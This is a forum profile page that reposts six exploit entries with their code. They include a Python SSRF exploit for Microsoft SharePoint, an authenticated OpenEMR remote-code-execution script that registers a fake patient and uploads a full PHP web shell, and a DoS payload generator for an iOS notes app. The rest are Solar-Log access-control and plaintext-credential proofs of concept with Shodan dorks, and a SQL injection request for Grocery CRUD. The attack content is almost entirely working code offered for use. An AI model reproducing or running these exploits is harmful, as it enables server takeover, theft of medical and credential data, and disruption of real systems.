Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    n+otes 1.6.2 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: n+otes 1.6.2 - Denial of Service (PoC) # Date: 06-09-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/us/app/n-otes/id596895960 # Version: 1.6.2 # Category: DoS (iOS) ##### Vulnerability ##### Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: # STEPS # # Open the program. # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt twice in the new Note. # Crashed Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
  2. HireHackking

    Microsoft SharePoint Server 16.0.10372.20060 - 'GetXmlDataFromDataSource' Server-Side Request Forgery (SSRF)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Microsoft SharePoint Server 16.0.10372.20060 - 'GetXmlDataFromDataSource' Server-Side Request Forgery (SSRF) # Date: 09 Jun 2021 # Exploit Author: Alex Birnberg # Software Link: https://www.microsoft.com/en-us/download/details.aspx?id=57462 # Version: 16.0.10372.20060 # Tested on: Windows Server 2019 # CVE : CVE-2021-31950 #!/usr/bin/env python3 import html import random import string import xml.sax.saxutils import textwrap import requests import argparse import xml.etree.ElementTree as ET from requests_ntlm2 import HttpNtlmAuth from urllib.parse import urlencode, urlparse class Exploit: def __init__(self, args): o = urlparse(args.url) self.url = args.url self.service = o.path self.username = args.username self.password = args.password self.target = args.target self.headers = args.header self.method = args.request self.data = args.data self.content_type = args.content_type self.s = requests.Session() self.s.auth = HttpNtlmAuth(self.username, self.password) self.s.headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36' } self.s.proxies = { 'http': 'http://127.0.0.1:8080' } def trigger(self): headers = '' if self.headers: for header in self.headers: header = list(map(lambda x: x.strip(), header.split(':'))) if len(header) != 2: continue headers += '<dataurl:Header name="{}">{}</dataurl:Header>'.format(header[0], header[1]) method = '' bypass_local = '' if self.method and self.method.upper() == 'POST': method = 'HTTP Post' else: method = 'HTTP Get' bypass_local = '<dataurl:Arguments><dataurl:Argument Name="{0}">{0}</dataurl:Argument></dataurl:Arguments>'.format(''.join(random.choice(string.ascii_letters) for i in range(16))) content_type = '' if self.content_type and len(self.content_type): content_type = '<dataurl:ContentType>{}</dataurl:ContentType>'.format(self.content_type) data = '' if self.data and len(self.data): data = '<dataurl:PostData Encoding="Decode">{}</dataurl:PostData>'.format(html.escape(self.data).encode('ascii', 'xmlcharrefreplace').decode('utf-8')) query_xml = textwrap.dedent('''\ <udc:DataSource xmlns:udc="http://schemas.microsoft.com/data/udc" xmlns:udcs="http://schemas.microsoft.com/data/udc/soap" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:dsp="http://schemas.microsoft.com/sharepoint/dsp" xmlns:dataurl="http://schemas.microsoft.com/sharepoint/dsp/xmlurl"> <udc:ConnectionInfo> <udcs:Location href="">XMLURLDataAdapter</udcs:Location> <soap:Header> <dsp:versions> </dsp:versions> <dsp:request method="query" /> </soap:Header> <soap:Body> <dsp:queryRequest> <dsp:ptQuery> <dataurl:Headers> <dataurl:Url href="{}" Method="{}"/> {} {} {} {} </dataurl:Headers> </dsp:ptQuery> </dsp:queryRequest> </soap:Body> </udc:ConnectionInfo> </udc:DataSource>'''.format(self.target, method, bypass_local, headers, data, content_type)) query_xml = xml.sax.saxutils.escape(query_xml.replace('\r', '').replace('\n', '')) data = textwrap.dedent('''\ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetXmlDataFromDataSource xmlns="http://microsoft.com/sharepoint/webpartpages"> <queryXml>{}</queryXml> </GetXmlDataFromDataSource> </soap:Body> </soap:Envelope>'''.format(query_xml)) r = self.soap('webpartpages', 'http://microsoft.com/sharepoint/webpartpages/GetXmlDataFromDataSource', data) root = ET.fromstring(r.content) try: namespaces = { 'soap': 'http://schemas.xmlsoap.org/soap/envelope/' } value = list(root.find('soap:Body', namespaces).iter())[2] if value.tag == 'faultcode': print('Error:', list(root.find('soap:Body', namespaces).iter())[3].text) else: print(value.text) except: print(r.content) pass def soap(self, service, action, data): headers = { 'SOAPAction': '"{}"'.format(action), 'Host': 'localhost', 'Content-Type': 'text/xml; charset=utf-8', } return self.s.post('{}/_vti_bin/{}.asmx'.format(self.url, service), headers=headers, data=data) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--url', help='Base URL', required=True, metavar='<url>') parser.add_argument('--username', help='Username of team site owner', required=True, metavar='<username>') parser.add_argument('--password', help='Password of team site owner', required=True, metavar='<password>') parser.add_argument('--target', help='Target URL to work with', required=True, metavar='<target>') parser.add_argument('-H', '--header', help='Pass custom header(s) to server', action='append', metavar='<header>') parser.add_argument('-X', '--request', help='Specify request command to use', metavar='<command>') parser.add_argument('-d', '--data', help='HTTP POST data', metavar='<data>') parser.add_argument('-c', '--content-type', help='Value for the "Content-Type" header', metavar='<type>') exploit = Exploit(parser.parse_args()) exploit.trigger()
  3. HireHackking

    OpenEMR 5.0.0 - Remote Code Execution (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: OpenEMR 5.0.0 - Remote Code Execution (Authenticated) # Date 10.06.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://sourceforge.net/projects/openemr/files/OpenEMR%20Current/5.0.0/openemr-5.0.0.zip/download # Version: 5.0.0 # Tested on: Windows 10 # CVE: CVE-2017-9380 # Documentation: https://github.com/Hacker5preme/Exploits#cve-2017-9380-exploit ''' Description: The OpenEMR application allows users from all roles to upload files. However, the application does not whitelist only certain type of files (e.g. PDF, JPG, PNG, DOCX, etc). At the contary, any type of files can be uploaded to the filesystem via the application. While OpenEMR recommends during the installation to restrict access to the repository hosting uploaded files, unfortunately, such recommendations are too often ignored by users and can result in full compromise of the web server and its data. ''' ''' Import required modules: ''' import argparse import requests import string import random ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='Exploit for CVE-2017-9380') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT openemr_path = args.PATH username = args.USERNAME password = args.PASSWORD ''' Exploit: ''' # Authentication preparation: session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default' auth_chek_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/login/login.php?site=default' response = session.get(auth_chek_url) # Header (auth): header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Referer': auth_chek_url, 'Upgrade-Insecure-Requests': '1', } # Body (auth): body = { 'new_login_session_management': '1', 'authProvider': 'Default', 'authUser': username, 'clearPass': password, 'languageChoice': '1' } # Authenticate: print('') print('[+] Authentication') auth = session.post(auth_url,headers=header, data=body) # Create random patient name: letters_up = string.ascii_uppercase letters_down = string.ascii_lowercase first_name = ''.join(random.choice(letters_up)) + ''.join(random.choice(letters_down) for i in range(10)) surname = ''.join(random.choice(letters_up)) + ''.join(random.choice(letters_down) for i in range(7)) print('') print('[+] Creating patient name randomly:') print(' [*] First Name: ' + first_name) print(' [*] Surname: ' + surname) # Registration preparation: url_reg = 'http://' + target_ip + ':' + target_port + openemr_path + 'interface/new/new_comprehensive_save.php' # Header (registration): header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Referer': 'http://' + target_ip + ':' + target_port + openemr_path + 'interface/new/new.php', 'Upgrade-Insecure-Requests': '1' } body = { 'form_cb_1': '1', 'form_title': 'Mr.', 'form_fname': first_name, 'form_mname': '', 'form_lname': surname, 'form_pubpid': '', 'form_DOB': '2021-05-04', 'form_sex': 'Male', 'form_ss': '', 'form_drivers_license': '', 'form_status': '', 'form_genericname1': '', 'form_genericval1': '', 'form_genericname2': '', 'form_genericval2': '', 'form_billing_note': '', 'form_street': '', 'form_city': '', 'form_state': '', 'form_postal_code': '', 'form_county': '', 'form_country_code': '', 'form_mothersname': '', 'form_contact_relationship': '', 'form_phone_contact': '', 'form_phone_home': '', 'form_phone_biz': '', 'form_phone_cell': '', 'form_email': '', 'form_email_direct': '', 'form_providerID': '', 'form_ref_providerID': '', 'form_pharmacy_id': '0', 'form_hipaa_notice': '', 'form_hipaa_voice': '', 'form_hipaa_message': '', 'form_hipaa_mail': '', 'form_hipaa_allowsms': '', 'form_hipaa_allowemail': '', 'form_allow_imm_reg_use': '', 'form_allow_imm_info_share': '', 'form_allow_health_info_ex': '', 'form_allow_patient_portal': '', 'form_care_team': '', 'form_cmsportal_login': '', 'form_imm_reg_status': '', 'form_imm_reg_stat_effdate': '', 'form_publicity_code': '', 'form_publ_code_eff_date': '', 'form_protect_indicator': '', 'form_prot_indi_effdate': '', 'form_industry': '', 'form_occupation': '', 'form_em_name': '', 'form_em_street': '', 'form_em_city': '', 'form_em_state': '', 'form_em_postal_code': '', 'form_em_country': '', 'form_language': '', 'form_ethnicity': '', 'form_family_size': '', 'form_financial_review': '', 'form_monthly_income': '', 'form_homeless': '', 'form_interpretter': '', 'form_migrantseasonal': '', 'form_referral_source': '', 'form_vfc': '', 'form_religion': '', 'form_deceased_date': '', 'form_deceased_reason': '', 'form_guardiansname': '', 'form_guardianrelationship': '', 'form_guardiansex': '', 'form_guardianaddress': '', 'form_guardiancity': '', 'form_guardianstate': '', 'form_guardianpostalcode': '', 'form_guardiancountry': '', 'form_guardianphone': '', 'form_guardianworkphone': '', 'form_guardianemail': '', 'i1provider': '', 'i1plan_name': '', 'i1effective_date': '', 'i1policy_number': '', 'i1group_number': '', 'i1subscriber_employer': '', 'i1subscriber_employer_street': '', 'i1subscriber_employer_city': '', 'form_i1subscriber_employer_state': '', 'i1subscriber_employer_postal_code': '', 'form_i1subscriber_employer_country': '', 'i1subscriber_fname': '', 'i1subscriber_mname': '', 'i1subscriber_lname': '', 'form_i1subscriber_relationship': '', 'i1subscriber_DOB': '', 'i1subscriber_ss': '', 'form_i1subscriber_sex': '', 'i1subscriber_street': '', 'i1subscriber_city': '', 'form_i1subscriber_state': '', 'i1subscriber_postal_code': '', 'form_i1subscriber_country': '', 'i1subscriber_phone': '', 'i1copay': '', 'i1accept_assignment': 'TRUE', 'i2provider': '', 'i2plan_name': '', 'i2effective_date': '', 'i2policy_number': '', 'i2group_number': '', 'i2subscriber_employer': '', 'i2subscriber_employer_street': '', 'i2subscriber_employer_city': '', 'form_i2subscriber_employer_state': '', 'i2subscriber_employer_postal_code': '', 'form_i2subscriber_employer_country': '', 'i2subscriber_fname': '', 'i2subscriber_mname': '', 'i2subscriber_lname': '', 'form_i2subscriber_relationship': '', 'i2subscriber_DOB': '', 'i2subscriber_ss': '', 'form_i2subscriber_sex': '', 'i2subscriber_street': '', 'i2subscriber_city': '', 'form_i2subscriber_state': '', 'i2subscriber_postal_code': '', 'form_i2subscriber_country': '', 'i2subscriber_phone': '', 'i2copay': '', 'i2accept_assignment': 'TRUE', 'i3provider': '', 'i3plan_name': '', 'i3effective_date': '', 'i3policy_number': '', 'i3group_number': '', 'i3subscriber_employer': '', 'i3subscriber_employer_street': '', 'i3subscriber_employer_city': '', 'form_i3subscriber_employer_state': '', 'i3subscriber_employer_postal_code': '', 'form_i3subscriber_employer_country': '', 'i3subscriber_fname': '', 'i3subscriber_mname': '', 'i3subscriber_lname': '', 'form_i3subscriber_relationship': '', 'i3subscriber_DOB': '', 'i3subscriber_ss': '', 'form_i3subscriber_sex': '', 'i3subscriber_street': '', 'i3subscriber_city': '', 'form_i3subscriber_state': '', 'i3subscriber_postal_code': '', 'form_i3subscriber_country': '', 'i3subscriber_phone': '', 'i3copay': '', 'i3accept_assignment': 'TRUE'} print('') print('[+] Registering patient:') x = session.post(url_reg, headers=header, data=body).text # Get Patient-ID: id = x[(x.find('pid=')+4):x.find('&')] print(' [*] ID-NUMBER: ' + id) # Construct upload URL: url_upload = 'http://' + target_ip + ':' + target_port + openemr_path + '/controller.php?document&upload&patient_id=' + id + '&parent_id=1&"' # Header (upload): header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------370797319835249590062969815666", "Origin": 'http://' + target_ip, "Connection": "close", "Referer": url_upload, "Upgrade-Insecure-Requests": "1" } # Body (shell); I'm using p0wny shell: https://github.com/flozz/p0wny-shell body = "-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n64000000\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"file[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n _updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event || window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"destination\"\r\n\r\n\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"patient_id\"\r\n\r\n4\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"category_id\"\r\n\r\n4\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"process\"\r\n\r\ntrue\r\n-----------------------------370797319835249590062969815666--\r\n" # Exploit x = session.post(url_upload, headers=header,data=body).text print('') print('[+] Uploading your Webshell') b = x[x.find('documents/') + 10:] c = b[:b.find('<')] webshellpath = 'http://' + target_ip + ':' + target_port + openemr_path + '/sites/default/documents/' + c print(' [*] Webshell: ' + webshellpath) print('')
  4. HireHackking

    Solar-Log 500 2.8.2 - Incorrect Access Control

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Solar-Log 500 2.8.2 - Incorrect Access Control # Google Dork: In Shodan search engine, the filter is ""Server: IPC@CHIP"" # Date: 2021-06-11 # Exploit Author: Luca.Chiou # Vendor Homepage: https://www.solar-log.com/en/ # Software Link: Firmware for Solar-Log https://www.solar-log.com/en/support/firmware/ # Version: Solar-Log 500 all versions prior to 2.8.2 Build 52 - 23.04.2013 # Tested on: It is a proprietary devices: https://www.solar-log.com/en/support/firmware/ # 1. Description: # The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, # which allows arbitrary remote attackers to gain administrative privileges by connecting to the server. # As a result, the attacker can modify configuration files and change the system status. # 2. Proof of Concept: # Access the /lan.html of Solar-Log 500 without ANY authentication, # and you can get gain administrative privileges to modify configuration files and change the system status. # http://<Your Modem IP>/lan.html
  5. HireHackking

    Solar-Log 500 2.8.2 - Unprotected Storage of Credentials

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Solar-Log 500 2.8.2 - Unprotected Storage of Credentials # Google Dork: In Shodan search engine, the filter is ""Server: IPC@CHIP"" # Date: 2021-06-11 # Exploit Author: Luca.Chiou # Vendor Homepage: https://www.solar-log.com/en/ # Software Link: Firmware for Solar-Log https://www.solar-log.com/en/support/firmware/ # Version: Solar-Log 500 all versions prior to 2.8.2 Build 52 - 23.04.2013 # Tested on: It is a proprietary devices: https://www.solar-log.com/en/support/firmware/ # 1. Description: # An issue was discovered in Solar-Log 500 prior to 2.8.2 Build 52 - 23.04.2013. # In /export.html, email.html, sms.html, the devices store plaintext passwords, # which may allow sensitive information to be read by someone with access to the device. # 2. Proof of Concept: # Browse the configuration page in Solar-Log 500, # we can find out that the passwords of FTP, SMTP, SMS services are stored in plaintext. # http://<Your Modem IP>/export.html # http://<Your Modem IP>/email.html # http://<Your Modem IP>/sms.html
  6. HireHackking

    Grocery crud 1.6.4 - 'order_by' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Grocery crud 1.6.4 - 'order_by' SQL Injection # Date: 11/06/1963 # Exploit Author: TonyShavez # Vendor Homepage: https://www.grocerycrud.com/ # Software Link: https://www.grocerycrud.com/downloads # Version: < v2.0.1 # Tested on: [Linux Ubuntu] Proof Of concept : ======================= #Request: POST /path/to/ajax_list HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 68 DNT: 1 Connection: close page=1&per_page=100&order_b=&order_by[]={INJECT HERE}&search_field=&search_text= ======================= #vulnerable parameter : order_by ======================= #type : [error-based]
  7. HireHackking

